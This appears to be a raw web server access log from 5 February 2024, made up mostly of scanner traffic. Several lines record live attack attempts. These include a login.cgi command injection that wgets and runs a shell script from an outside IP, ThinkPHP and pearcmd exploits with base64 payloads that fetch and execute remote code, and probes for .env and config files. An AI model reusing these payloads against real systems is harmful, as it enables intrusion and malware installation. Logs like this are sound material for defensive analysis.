146.19.24.23 - - [05/Feb/2024:00:42:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:40 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "GET /.env.dev HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "GET /?pp=env HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "GET /docker-compose.yml HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "GET /app/config/parameters.yml HTTP/1.1" 404 330 "-" "Go-http-client/1.1"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [05/Feb/2024:00:45:42 +0100] "GET /appsettings.json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
146.19.24.23 - - [05/Feb/2024:00:48:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [05/Feb/2024:00:55:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.172.21 - - [05/Feb/2024:00:56:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
103.149.192.6 - - [05/Feb/2024:00:57:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
176.97.210.229 - - [05/Feb/2024:00:57:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
172.105.128.11 - - [05/Feb/2024:01:02:06 +0100] "\x16\x03\x01" 501 318 "-" "-"
156.146.62.139 - - [05/Feb/2024:01:05:05 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.91.223.136/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
89.190.156.234 - - [05/Feb/2024:01:09:27 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.79.172.21 - - [05/Feb/2024:01:10:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.175 - - [05/Feb/2024:01:10:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [05/Feb/2024:01:10:33 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
45.95.147.236 - - [05/Feb/2024:01:12:33 +0100] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:01:12:33 +0100] "GET /index.php?lang=../../../../../../../../tmp/index HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:01:12:33 +0100] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=|base64${IFS}-d|sh HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:01:12:33 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:01:12:33 +0100] "GET /public/index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
176.97.210.211 - - [05/Feb/2024:01:14:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.129.54.86 - - [05/Feb/2024:01:17:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
154.127.54.49 - - [05/Feb/2024:01:18:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
154.127.54.49 - - [05/Feb/2024:01:18:16 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
71.6.232.26 - - [05/Feb/2024:01:24:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
71.6.232.26 - - [05/Feb/2024:01:28:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
176.97.210.229 - - [05/Feb/2024:01:32:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.147.236 - - [05/Feb/2024:01:40:30 +0100] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:01:40:30 +0100] "GET /index.php?lang=../../../../../../../../tmp/index HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:01:40:30 +0100] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=|base64${IFS}-d|sh HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:01:40:30 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:01:40:30 +0100] "GET /public/index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
103.149.192.151 - - [05/Feb/2024:01:41:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
89.190.156.234 - - [05/Feb/2024:01:42:24 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
162.216.149.107 - - [05/Feb/2024:01:42:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
162.216.150.130 - - [05/Feb/2024:01:43:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
184.105.139.69 - - [05/Feb/2024:01:44:58 +0100] "\x16\x03\x01" 501 318 "-" "-"
71.6.232.26 - - [05/Feb/2024:01:46:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
176.97.210.229 - - [05/Feb/2024:01:48:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
71.6.232.26 - - [05/Feb/2024:01:48:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
205.210.31.162 - - [05/Feb/2024:01:52:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [05/Feb/2024:01:53:59 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
36.73.34.156 - - [05/Feb/2024:02:02:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
103.149.192.177 - - [05/Feb/2024:02:02:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
176.97.210.229 - - [05/Feb/2024:02:08:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.147.236 - - [05/Feb/2024:02:08:55 +0100] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:02:08:55 +0100] "GET /index.php?lang=../../../../../../../../tmp/index HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:02:08:56 +0100] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=|base64${IFS}-d|sh HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:02:08:56 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [05/Feb/2024:02:08:56 +0100] "GET /public/index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
176.97.210.229 - - [05/Feb/2024:02:17:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.233.75.51 - - [05/Feb/2024:02:19:46 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [05/Feb/2024:02:19:47 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [05/Feb/2024:02:19:47 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [05/Feb/2024:02:19:47 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
51.83.75.133 - - [05/Feb/2024:02:19:52 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
51.83.75.133 - - [05/Feb/2024:02:20:00 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
51.83.75.133 - - [05/Feb/2024:02:20:53 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
51.83.75.133 - - [05/Feb/2024:02:21:12 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
71.6.232.26 - - [05/Feb/2024:02:21:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
89.190.156.234 - - [05/Feb/2024:02:25:23 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
51.83.75.133 - - [05/Feb/2024:02:25:55 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
46.228.199.158 - - [05/Feb/2024:02:30:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
146.19.24.23 - - [05/Feb/2024:02:33:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.142.236.41 - - [05/Feb/2024:02:36:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.41 - - [05/Feb/2024:02:36:00 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.41 - - [05/Feb/2024:02:36:01 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
45.128.232.191 - - [05/Feb/2024:02:36:01 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.142.236.41 - - [05/Feb/2024:02:36:03 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.41 - - [05/Feb/2024:02:36:06 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
146.19.24.23 - - [05/Feb/2024:02:36:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [05/Feb/2024:02:39:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
71.6.232.26 - - [05/Feb/2024:02:40:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
146.19.24.23 - - [05/Feb/2024:02:43:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.235 - - [05/Feb/2024:02:44:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
146.19.24.23 - - [05/Feb/2024:02:46:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
176.97.210.231 - - [05/Feb/2024:02:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [05/Feb/2024:02:52:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [05/Feb/2024:02:52:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
3.101.25.107 - - [05/Feb/2024:02:53:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
146.19.24.23 - - [05/Feb/2024:02:53:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.145 - - [05/Feb/2024:02:55:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
78.153.140.175 - - [05/Feb/2024:02:55:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [05/Feb/2024:02:55:40 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
64.62.197.138 - - [05/Feb/2024:02:57:46 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
176.97.210.231 - - [05/Feb/2024:02:58:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.147 - - [05/Feb/2024:02:58:15 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
176.97.210.231 - - [05/Feb/2024:02:59:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [05/Feb/2024:03:06:37 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
164.52.0.94 - - [05/Feb/2024:03:06:39 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
164.52.0.94 - - [05/Feb/2024:03:06:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
45.128.232.191 - - [05/Feb/2024:03:06:41 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
164.52.0.94 - - [05/Feb/2024:03:06:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
164.52.0.94 - - [05/Feb/2024:03:06:46 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
164.52.0.94 - - [05/Feb/2024:03:06:46 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.0.94 - - [05/Feb/2024:03:06:49 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
176.97.210.231 - - [05/Feb/2024:03:12:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
54.67.61.39 - - [05/Feb/2024:03:12:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
176.97.210.231 - - [05/Feb/2024:03:15:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.58 - - [05/Feb/2024:03:16:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.58 - - [05/Feb/2024:03:16:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.58 - - [05/Feb/2024:03:16:44 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.58 - - [05/Feb/2024:03:16:44 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
66.240.205.34 - - [05/Feb/2024:03:20:13 +0100] "Gh0st\xad" 501 321 "-" "-"
3.101.25.107 - - [05/Feb/2024:03:23:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
3.10.225.225 - - [05/Feb/2024:03:33:31 +0100] "U\x8c\xf3J\x80\xa9dR`\x18\x04\xb0\xf0\xd0" 501 329 "-" "-"
176.97.210.229 - - [05/Feb/2024:03:34:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.139.104.10 - - [05/Feb/2024:03:35:03 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.128.232.191 - - [05/Feb/2024:03:36:29 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
3.10.225.225 - - [05/Feb/2024:03:42:26 +0100] "q\xaf\xe7\x8f5|X\xf4`\x18\x04\xb0\xce\x0c" 501 328 "-" "-"
45.128.232.191 - - [05/Feb/2024:03:43:34 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
